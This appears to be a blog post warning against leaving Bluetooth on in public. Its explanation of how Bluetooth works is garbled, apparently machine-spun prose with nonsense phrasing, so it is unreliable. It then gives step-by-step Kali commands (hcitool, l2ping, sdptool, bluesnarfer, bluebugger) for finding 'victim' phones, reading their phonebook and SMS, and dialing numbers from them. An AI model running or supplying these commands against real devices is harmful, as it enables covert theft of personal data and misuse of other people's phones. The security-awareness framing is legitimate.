Basically, keeping Bluetooth active on your phone at all times opens you up to potential hack, abuse and privacy violations. The solution is simple: Don't use it. Or, if you need to, make sure to turn off the device as soon as you've opened the pair. This caution may now look like a pain, but any frustration that comes from repeated linking and unlinking your gadgets pales in comparison to being hacked or systematically violating your privacy. So turn off Bluetooth, grab some wired headphones, and enjoy the sweet sound of knowing you've taken basic digital security precautions.
In this article I 'll tell why should not Open Bluetooth in public area and also about bluetooth attack. First we know how bluetooth works.
Disclamer
This Article just for education purpose author does'nt promote illigal activity
How Bluetooth Works
Bluetooth has two types of letters, basic (also known as teacher) and secondary (also known as slave). As a general rule, the secondary device sends an ad packet and allows another device to connect to it. Master Device is responsible for receiving these ads and starting connections to peripherals. It is possible that a device B plays both roles simultaneously, primary device A for connection to secondary device C and secondary (see table below) for connection to primary. Once the communication is established, data is exchanged between the two devices,
For example, suppose we have a Bluetooth headset and we want to connect to a computer. In this case, headphones will act as peripherals and send packets to the medium stating that they are available for connection. These packets will be registered from the computer and we will see that headphones are available for connection. This way the pair or association process will start (if it is the first time we connect) and after finishing, they will connect to the computer (the basic device).
How bluetooth attack Accured:
BlueRanger is an easy Bash script which uses hyperlink first-rate to locate Bluetooth tool radios. It sends l2cap (Bluetooth) pings to create a connection among Bluetooth interfaces, given that maximum devices allow pings without any authentication or authorization. The better the link high-quality, the nearer the device (in theory).
Also Read: MS Office Built-In Feature Can Be Exploited By Creating Self Replicating Malware
Use a Bluetooth magnificence 1 adapter for long variety area detection. switch to a class three adapter for a unique short variety finding. The precision and accuracy rely on the construct fine of the Bluetooth adapter, interference, and reaction from the far-flung device. Fluctuations may arise even when neither device is in motion.
Use the Bluetooth interface (hci1) to scan for the specified remote address (20:C9:D0:43:4B:D8):
root@kali:~# blueranger.sh hci1 20:C9:D0:43:4B:D8Bluesnarfer
Bluesnarfer downloads the cellphone-ebook of any mobile tool liable to Bluesnarfing. If an cell smartphone is susceptible, it’s far possible to hook up with the phone without alerting the owner, and advantage get entry to restrained quantities of the saved facts.
Scan the remote device address (-b 20:C9:D0:43:4B:D8) and get the device info (-i):
root@kali:~# bluesnarfer -b 20:C9:D0:43:4B:D8 -i
2nd Attack:
Check The Configuration
hciconfig hci0
Scan for victims
hcitool scan hci0
Ping the victim device to see if device is awake
l2ping < Victim MAC Addr>
Browse the victim for rfcomm channels to connect to
sdptool browse –tree –l2cap < mac addr >
Then you can use bluesnarfer, for example, to read the victims phonebook, dial a number or read Sms or other things
Bluesnarfer -r 1-100 -C 7 -b < mac addr >
To see available opions to do
bluebugger -h
Dial number
bluebugger -m < victim name > -c 7 -a < mac addr > Dial < number >
No comments:
Post a Comment